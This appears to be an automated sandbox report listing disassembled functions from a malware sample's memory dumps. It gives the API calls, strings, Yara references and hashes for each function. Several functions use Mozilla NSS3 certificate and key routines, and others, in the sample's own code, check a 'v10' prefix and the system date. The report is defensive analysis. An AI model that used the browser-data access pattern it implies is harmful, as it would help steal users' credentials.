Uniqueness Score: -1.00%

Function 6BCACAA0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6BC8B1EE,D958E836,?,6BCC51C5), ref: 6BCACAFA
PR_UnloadLibrary.NSS3(?,6BCC51C5), ref: 6BCACB09
PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6BC8B1EE,D958E836,?,6BCC51C5), ref: 6BCACB2C
PR_UnloadLibrary.NSS3(6BCC51C5), ref: 6BCACB3E

Strings

NSS_DISABLE_UNLOAD, xrefs: 6BCACAF5, 6BCACB27

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: LibrarySecureUnload
String ID: NSS_DISABLE_UNLOAD
API String ID: 4190191112-1204168554
Opcode ID: 609a53585bc0ebc0e2c1b7954af5934a3ce90fa06a77323a806bf772c3c231fd
Instruction ID: fc16ecebaac75f83d6535d7d3355ac4a8d6e17b19f0c8985921f2199258ead93
Opcode Fuzzy Hash: 609a53585bc0ebc0e2c1b7954af5934a3ce90fa06a77323a806bf772c3c231fd
Instruction Fuzzy Hash: 5E11D3B1921A229BF701DB69EC45B93F3B4BB82B49F00406ED505C6180F779E694CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 6BC8CB60 Relevance: 7.8, APIs: 5, Instructions: 253COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE041,00000000,?,?,?,?,00000000,?,00000000,?,6BC957DF,00000000,?,00000002,6BC95840,?), ref: 6BC8CBB5
TlsGetValue.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,6BC957DF,00000000,?,00000002,6BC95840,?), ref: 6BC8CC4A
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,?,00000000,?,00000000,?,6BC957DF,00000000,?,00000002,6BC95840), ref: 6BC8CC5E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6BC8CC98
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BC8CD50

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Unlock$CriticalEnterErrorSectionValue
String ID:
API String ID: 1974170392-0
Opcode ID: 3a75e3fefa508ee482d69b6c1599afaaa8d6c4f288827aeafca1cad80278b505
Instruction ID: 0989d3ff9bd3c6a2e4cb96ecd51c261b14140d575c102a24ddcb22fd1b036eb1
Opcode Fuzzy Hash: 3a75e3fefa508ee482d69b6c1599afaaa8d6c4f288827aeafca1cad80278b505
Instruction Fuzzy Hash: CE91B476D112189FDB00DFA8E881A9EBBB5FF49318F050169E805EB311F738EA11CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BC78B50 Relevance: 7.7, APIs: 5, Instructions: 218COMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3 ref: 6BC78B5C
CERT_DecodeAVAValue.NSS3 ref: 6BC78B67

Part of subcall function 6BC78E00: PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6BC78EED
Part of subcall function 6BC78E00: SEC_QuickDERDecodeItem_Util.NSS3(?,?,6BDA18D0,?), ref: 6BC78F03
Part of subcall function 6BC78E00: PR_CallOnce.NSS3(6BDD2AA4,6BCD12D0), ref: 6BC78F19
Part of subcall function 6BC78E00: PL_FreeArenaPool.NSS3(?), ref: 6BC78F2B

SECITEM_CompareItem_Util.NSS3(?,?), ref: 6BC78D5C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6BC78D6B
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6BC78D76

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Item_Util$Decode$ArenaPoolValueZfree$CallCompareFreeInitOnceQuick
String ID:
API String ID: 185717074-0
Opcode ID: 0b2f8dd38a6241c10cbb34373fa26296834094dbcb1128f17eabedd40295e484
Instruction ID: 9e01a3824bdb4ca0dee5b4bcfd0c79f0dca63222a679e422fedf09b982aa5ff1
Opcode Fuzzy Hash: 0b2f8dd38a6241c10cbb34373fa26296834094dbcb1128f17eabedd40295e484
Instruction Fuzzy Hash: E1710671F116258FDB349B5A8850FAAB7F2FB59320F194275DA28973C1F3389E0187A0

Uniqueness

Uniqueness Score: -1.00%

Function 6BD17AC0 Relevance: 7.7, APIs: 5, Instructions: 153COMMON

Download Yara Rule

APIs

NSS_SecureMemcmp.NSS3(?,6BCF43B7,00000008,?,?,?,?,?,?,6BCF3FAF,00000001), ref: 6BD17B3B
PR_SetError.NSS3(FFFFD01D,00000000), ref: 6BD17B8E
PR_SetError.NSS3(FFFFD09C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6BCF3FAF,00000001), ref: 6BD17BFE
PR_SetError.NSS3(FFFFD01D,00000000), ref: 6BD17C14
PR_SetError.NSS3(FFFFD01D,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BD17C30

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Error$MemcmpSecure
String ID:
API String ID: 1457316836-0
Opcode ID: 2887c22dafbe74226cdefe83a6ac63d1846da50cf6ad065e685d3c70112ed12e
Instruction ID: 9cee0c9d133691f74e0dc9b6eb9ce90c10bd1fcec1f68bf35128662cfbed5d7f
Opcode Fuzzy Hash: 2887c22dafbe74226cdefe83a6ac63d1846da50cf6ad065e685d3c70112ed12e
Instruction Fuzzy Hash: B15127B0B08616FAE3148F34ED45BE6F764BF44718F008228E5185E292FB7962A4D7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6BCB6AE0 Relevance: 7.6, APIs: 6, Instructions: 125stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6BCB6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6BCB6943
Part of subcall function 6BCB6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6BCB6957
Part of subcall function 6BCB6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6BCB6972
Part of subcall function 6BCB6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6BCB6983
Part of subcall function 6BCB6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6BCB69AA
Part of subcall function 6BCB6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6BCB69BE
Part of subcall function 6BCB6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6BCB69D2
Part of subcall function 6BCB6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6BCB69DF
Part of subcall function 6BCB6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6BCB6A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000,6BCB781D,?,6BCABE2C,?,00000000,00000000), ref: 6BCB6B66
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,6BCB781D,?,6BCABE2C,?,00000000,00000000), ref: 6BCB6B88
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,6BCB781D,?,6BCABE2C,?,00000000,00000000), ref: 6BCB6BAF
free.MOZGLUE(00000000,?,?,?,?,00000000,00000000,6BCB781D,?,6BCABE2C,?,00000000,00000000), ref: 6BCB6BE6
free.MOZGLUE(?,?,?,?,?,00000000,00000000,6BCB781D,?,6BCABE2C,?,00000000,00000000), ref: 6BCB6BF7
free.MOZGLUE(6BCB781D,?,?,?,?,00000000,00000000,6BCB781D,?,6BCABE2C,?,00000000,00000000), ref: 6BCB6C08

Part of subcall function 6BCB6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6BCB781D,00000000,6BCABE2C,?,6BCB6B1D,?,?,?,?,00000000,00000000,6BCB781D), ref: 6BCB6C40
Part of subcall function 6BCB6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6BCB781D,?,6BCABE2C,?), ref: 6BCB6C58
Part of subcall function 6BCB6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6BCB781D), ref: 6BCB6C6F
Part of subcall function 6BCB6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6BCB6C84
Part of subcall function 6BCB6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6BCB6C96
Part of subcall function 6BCB6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6BCB6CAA

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: strcmpstrncmp$FlagL_strncasecmpfree$Strip$ParameterSecureSkip
String ID:
API String ID: 3779992554-0
Opcode ID: a8779464a59fc86a90e875fe386d6b5ca0789b5ab066783b6dd7bf94ef3a28a1
Instruction ID: 91b7a1f43f91b7456c6b1f0c1b840883490b7e5f62883c85f3e21a761a147dfe
Opcode Fuzzy Hash: a8779464a59fc86a90e875fe386d6b5ca0789b5ab066783b6dd7bf94ef3a28a1
Instruction Fuzzy Hash: 95415BB1E156199BEF00CFE5C844BAEF7B8AF09355F040479D815A7240F739EA40DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0040F200 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0040F228
strtok_s.MSVCRT ref: 0040F36D

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02F519B8,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: d90cb630be02cb88f9669fe10effb8b065c414a432e077175689f37fee939901
Instruction ID: 34556820f6e5338ba8e8a845a83fb71131f6fb13afd6d5a2f2d9a2f2ab0dc7f0
Opcode Fuzzy Hash: d90cb630be02cb88f9669fe10effb8b065c414a432e077175689f37fee939901
Instruction Fuzzy Hash: 4F514FB5A04209DFCB18CF54D595AAE7BB6FF48308F10817DE802AB390D734EA95CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6BCC4B00 Relevance: 7.6, APIs: 5, Instructions: 119stringCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,-00000001,00000000,?,?,6BCB7B3B,00000000,?,?,00000000), ref: 6BCC4BA3

Part of subcall function 6BCC8970: TlsGetValue.KERNEL32(?,00000000,6BC761C4,?,6BC75639,00000000), ref: 6BCC8991
Part of subcall function 6BCC8970: TlsGetValue.KERNEL32(?,?,?,?,?,6BC75639,00000000), ref: 6BCC89AD
Part of subcall function 6BCC8970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6BC75639,00000000), ref: 6BCC89C6
Part of subcall function 6BCC8970: PR_WaitCondVar.NSS3 ref: 6BCC89F7
Part of subcall function 6BCC8970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6BC75639,00000000), ref: 6BCC8A0C

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6BCC4B44
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6BCC4B7E
SECMOD_DestroyModule.NSS3(00000000), ref: 6BCC4C44
free.MOZGLUE(?), ref: 6BCC4C54

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Valuestrcmp$CondCriticalDestroyEnterErrorModuleSectionUnlockWaitfree
String ID:
API String ID: 3094473128-0
Opcode ID: 08c9d5e60c1055543f882247e4e74dcc60fa4a824d04f4edaca3b5d9b2dd574b
Instruction ID: bb959643d7cf6bdc611f89d729314af659b8b742426339c2c197e403a96d0e18
Opcode Fuzzy Hash: 08c9d5e60c1055543f882247e4e74dcc60fa4a824d04f4edaca3b5d9b2dd574b
Instruction Fuzzy Hash: 8741C1B5A116059BEB108F29EC01B1BB7A9AF60718F148064DC699B311F739FA10CBD3

Uniqueness

Uniqueness Score: -1.00%

Function 004097F0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 115memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 0040980B
memset.MSVCRT ref: 0040983E
LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02F519B8,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Strings

@, xrefs: 00409847
v10, xrefs: 00409802

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
String ID: @$v10
API String ID: 1400469952-24753345
Opcode ID: 6d1a1abe6e6826a1ce0dbdd1ef6ea650f8487a8d622505b14063b63e06140071
Instruction ID: 87859f0eaa1cac66c0422607c8296a2f5b7cfd88fdb957a476e5adb471fb7cf1
Opcode Fuzzy Hash: 6d1a1abe6e6826a1ce0dbdd1ef6ea650f8487a8d622505b14063b63e06140071
Instruction Fuzzy Hash: 00414EB0A00208EBDB04DFA5DC55FDE7B75BF44304F108119F909AB295DB78AE85CB98

Uniqueness

Uniqueness Score: -1.00%

Function 6BC76AF0 Relevance: 7.6, APIs: 5, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(00000000,6BC7B21D,00000000,00000000,6BC7B219,?,6BC76BFB,00000000,?,00000000,00000000,?,?,?,6BC7B21D), ref: 6BC76B01

Part of subcall function 6BCCFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6BCCFE08
Part of subcall function 6BCCFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6BCCFE1D
Part of subcall function 6BCCFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6BCCFE62

PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,6BC7B219,?,6BC76BFB,00000000,?,00000000,00000000,?,?,?,6BC7B21D), ref: 6BC76B36
PORT_ArenaAlloc_Util.NSS3(00000000,00000030), ref: 6BC76B47
SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6BC76B8A
SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000004,?,0000001C), ref: 6BC76BB6

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Util$Arena$Alloc_Item_$DecodeQuick$Errormemcpy
String ID:
API String ID: 1773792728-0
Opcode ID: bd40f6c343da11bc0287b8a3d854e938442bd96e154019af7bf870a116bdb714
Instruction ID: 3b8b530f8acd61b8bd87ed3771a5b7a743aad46e5ad7dda9b2d53d8f7626a46c
Opcode Fuzzy Hash: bd40f6c343da11bc0287b8a3d854e938442bd96e154019af7bf870a116bdb714
Instruction Fuzzy Hash: F9216372921B149BEB209FA4CC40F567BA8EB46394F044579EC099B201F739EB40DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6BCE4BB0 Relevance: 7.6, APIs: 5, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400,C083F089), ref: 6BCE4BDD

Part of subcall function 6BCD0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6BC787ED,00000800,6BC6EF74,00000000), ref: 6BCD1000
Part of subcall function 6BCD0FF0: PR_NewLock.NSS3(?,00000800,6BC6EF74,00000000), ref: 6BCD1016
Part of subcall function 6BCD0FF0: PL_InitArenaPool.NSS3(00000000,security,6BC787ED,00000008,?,00000800,6BC6EF74,00000000), ref: 6BCD102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,C083F089), ref: 6BCE4C03

Part of subcall function 6BCD10C0: TlsGetValue.KERNEL32(?,6BC78802,00000000,00000008,?,6BC6EF74,00000000), ref: 6BCD10F3
Part of subcall function 6BCD10C0: EnterCriticalSection.KERNEL32(?,?,6BC78802,00000000,00000008,?,6BC6EF74,00000000), ref: 6BCD110C
Part of subcall function 6BCD10C0: PL_ArenaAllocate.NSS3(?,?,?,6BC78802,00000000,00000008,?,6BC6EF74,00000000), ref: 6BCD1141
Part of subcall function 6BCD10C0: PR_Unlock.NSS3(?,?,?,6BC78802,00000000,00000008,?,6BC6EF74,00000000), ref: 6BCD1182
Part of subcall function 6BCD10C0: TlsGetValue.KERNEL32(?,6BC78802,00000000,00000008,?,6BC6EF74,00000000), ref: 6BCD119C

memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,C083F089), ref: 6BCE4C15
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,C083F089), ref: 6BCE4C3E

Part of subcall function 6BCCF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6BCCF0C8
Part of subcall function 6BCCF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6BCCF122

PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,C083F089), ref: 6BCE4C85

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Util$Arena_$ArenaFree$Value$Alloc_AllocateCriticalEncodeEnterInitItem_LockPoolSectionUnlockcallocmemset
String ID:
API String ID: 227267669-0
Opcode ID: ac807e030d017321ea3e95d77d24f49b949241679c8ad8210fce6d9ab94c42ac
Instruction ID: f7a40acb9737ae63735a55eecd23961bcc29c5f3b7f7081afb164e8a58ea1498
Opcode Fuzzy Hash: ac807e030d017321ea3e95d77d24f49b949241679c8ad8210fce6d9ab94c42ac
Instruction Fuzzy Hash: A121F6B2910210ABEB100EA5AC42B6F3A99EF45368F040174ED6897290FB39EA15C6F1

Uniqueness

Uniqueness Score: -1.00%

Function 6BC93AD0 Relevance: 7.6, APIs: 5, Instructions: 79COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,6BC95089,6BC8F39B,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6BC93AF1
EnterCriticalSection.KERNEL32(?,?,?,6BC95089,6BC8F39B,00000000), ref: 6BC93B0A
PR_Unlock.NSS3(?,?,?,?,6BC95089,6BC8F39B,00000000), ref: 6BC93B1F
DeleteCriticalSection.KERNEL32(?,?,?,?,6BC95089,6BC8F39B,00000000), ref: 6BC93B50
free.MOZGLUE(?,?,?,?,?,6BC95089,6BC8F39B,00000000), ref: 6BC93B5C

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: CriticalSection$DeleteEnterUnlockValuefree
String ID:
API String ID: 460358995-0
Opcode ID: 97aa1e3a39c1c5dde7237289124ff4010db2e68dae3b03e08ab5f432f2cdd681
Instruction ID: b56b00386224384c06aa1f427ce76520b215c7ee1e09e2c47cf23ef876d6f18a
Opcode Fuzzy Hash: 97aa1e3a39c1c5dde7237289124ff4010db2e68dae3b03e08ab5f432f2cdd681
Instruction Fuzzy Hash: 6C3108B4514A01DFEB00AF78D189929BBF4FF05354F064958DC899B311EB38E995CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 004135E0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(0041D8AC,?,?,004137D1,00000000,?,02F519B8,?,0041D8AC,?,00000000,?), ref: 0041362C
sscanf.NTDLL ref: 00413659
SystemTimeToFileTime.KERNEL32(0041D8AC,00000000,?,?,?,?,?,?,?,?,?,?,?,02F519B8,?,0041D8AC), ref: 00413672
SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,02F519B8,?,0041D8AC), ref: 00413680
ExitProcess.KERNEL32 ref: 0041369A

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 6ece8f90a5e9c96c819a443f693d3030017b725595645da224d6b2efd62f82e0
Instruction ID: a268315634fda69ed0a537ef202e87298384d27024bdd5aae2ec85167a5c17e0
